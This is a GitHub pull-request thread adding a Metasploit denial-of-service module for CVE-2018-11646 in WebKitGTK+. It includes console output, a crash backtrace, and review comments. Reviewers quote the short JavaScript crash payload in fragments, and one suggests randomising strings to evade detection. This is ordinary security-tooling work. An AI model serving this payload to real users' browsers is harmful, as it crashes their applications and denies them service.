
WebKit, as used in WebKitGTK+ Crash - CVE-2018-11646 #10156

Merged
merged 9 commits into from Jun 21, 2018

Conversation

Contributor

@RootUp RootUp commented Jun 9, 2018

Summary

This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful, it could lead to an application crash (denial of service). webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash.

Tested on: Epiphany Web Browser 3.28.x

Verification

msf auxiliary(dos/http/webkitplus) > show options 

Module options (auxiliary/dos/http/webkitplus):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.1.105    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /                no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer


msf auxiliary(dos/http/webkitplus) > run
[*] Auxiliary module running as background job 0.
msf auxiliary(dos/http/webkitplus) > 
[*] Using URL: http://192.168.1.105:8080/
[*] Server started.

msf auxiliary(dos/http/webkitplus) > 
[*] Sending response

msf auxiliary(dos/http/webkitplus) >

Backtrace using Fedora 27

#0 WTF::StringImpl::rawHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508
#1 WTF::StringImpl::hasHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514
#2 WTF::StringImpl::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525
#3 WTF::StringHash::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73
#9 WTF::HashMap, WTF::HashTraits >::get
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406
#10 webkitFaviconDatabaseSetIconURLForPageURL
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193
#11 webkitFaviconDatabaseSetIconForPageURL
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318
#12 webkitWebViewSetIcon
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964
#13 WTF::Function::performCallbackWithReturnValue
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108
#15 WebKit::WebPageProxy::dataCallback
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083
#16 WebKit::WebPageProxy::finishedLoadingIcon
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848
#17 IPC::callMemberFunctionImpl::operator()
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68
#29 WTF::RunLoop::::_FUN(gpointer)
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70
#30 g_main_dispatch
at gmain.c line 3148
#31 g_main_context_dispatch
at gmain.c line 3813
#32 g_main_context_iterate
at gmain.c line 3886
#33 g_main_context_iteration
at gmain.c line 3947
#34 g_application_run
at gapplication.c line 2401
#35 main
at ../src/ephy-main.c line 432 

References:
https://bugs.webkit.org/show_bug.cgi?id=186164
https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html

def setup
@html = <<-JS
<script type="text/javascript">
win = window.open("sleep_one_second.php", "WIN");
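Review bot: the heredoc opened on the second line is delimited `JS`, but its body is HTML rather than bare JavaScript (it starts with a `<script type="text/javascript">` tag), so an `HTML` delimiter would describe the content accurately. Separately, `win` is assigned without `var`, which makes it an implicit global; declaring it keeps the snippet self-contained.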
Contributor

What is sleep_one_second.php ?

Contributor Author

What I observed is that it can be anything, for example hello_world.php or WIN

@html = <<-JS
<script type="text/javascript">
win = window.open("sleep_one_second.php", "WIN");
window.open("https://www.paypal.com", "WIN");
Contributor

Can this be randomised? Does it need to be a real URL? If so, it should be configurable.

Contributor

Alternatively, can the URL point back to the MSF HTTP server?

Contributor Author

The URL is not necessary though; it can be configurable, or we can simply change it to WIN

win = window.open("sleep_one_second.php", "WIN");
window.open("https://www.paypal.com", "WIN");
win.document.execCommand('Stop');
win.document.write("Spoofed URL");
Contributor

Is this necessary? If so, is win.document.write(''); sufficient?

Contributor Author

Not sure about this, but it looks sufficient to trigger the crash in WebKitGTK+

super(
update_info(
info,
'Name' => "WebKitGTK+ leading to an application crash [DoS]",
Contributor

Perhaps: WebKitGTK+ WebKitFaviconDatabase DoS

'Manuel Caballero' #JS Code
],
'References' => [
['EXPLOIT-DB', '44842'],
Contributor

EDB

['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],
['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']
],
'DisclosureDate' => 'June 03 2018',
Contributor

'Jun 3 2018'

Thanks bcoles 😎
Contributor

timwr commented Jun 10, 2018

Great stuff @RootUp
You might also be interested in: https://github.com/MTJailed/MSF-Webkit-10.3

@bcoles bcoles added docs and removed needs-docs labels Jun 10, 2018
Contributor Author

RootUp commented Jun 10, 2018

Thanks @timwr
Never came across that repo, but will surely have a look.

@@ -0,0 +1,96 @@
## Vulnerable Application

This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful,it could leads to application crash, denial of service, webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash.
Contributor

This module exploits a vulnerability in `WebKitFaviconDatabase` when `pageURL` is unset.
If successful, it could lead to application crash, resulting in denial of service.

The `webkitFaviconDatabaseSetIconForPageURL` and `webkitFaviconDatabaseSetIconURLForPageURL`
functions in `UIProcess/API/glib/WebKitFaviconDatabase.cpp` in WebKit, as used in WebKitGTK+
through 2.21.3, mishandle an unset `pageURL`, leading to an application crash.


This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful,it could leads to application crash, denial of service, webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash.

Related links :
Contributor

Related links : 
* https://bugs.webkit.org/show_bug.cgi?id=186164
* https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html

'Name' => "WebKitGTK+ WebKitFaviconDatabase DoS",
'Description' => %q(
This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.
If successful,it could leads to application crash, denial of service.
Contributor

If successful, it could lead to application crash, resulting in denial of service.

win=window.open("sleep_one_second.php", "WIN");
window.open("https://www.paypal.com", "WIN");
win.document.execCommand('Stop');
win.document.write("Spoofed URL");
Contributor

Hardcoded strings like Spoofed URL and sleep_one_second.php make the code easier to detect and prevent. They also increase the chances of the user realising something suspicious is afoot, in the event they're using a non-vulnerable browser that doesn't crash. These should be randomized where possible.

Similarly, PayPal probably aren't keen on being used as the default URL (free advertising?). The URL should point elsewhere if possible.

Contributor Author

RootUp commented Jun 11, 2018

Thanks @bcoles 😎
I have made the necessary changes 👍

Contributor

@acammack-r7 acammack-r7 left a comment

Minor changes


class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer

Contributor

This also needs to

include Msf::Auxiliary::Dos

to avoid being unintentionally run by Pro and other tools.

Suggestions by acammack-r7
@busterb busterb self-assigned this Jun 21, 2018
Member

busterb commented Jun 21, 2018

WFM, thanks @RootUp !

Member

busterb commented Jun 21, 2018

Release Notes

This adds a DoS module for CVE-2018-11646, exploiting a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful, it can cause a crash in applications using a vulnerable version of WebKitGTK+ up to version 2.21.3.

@tdoan-r7 tdoan-r7 added the rn-enhancement release notes enhancement label Jul 5, 2018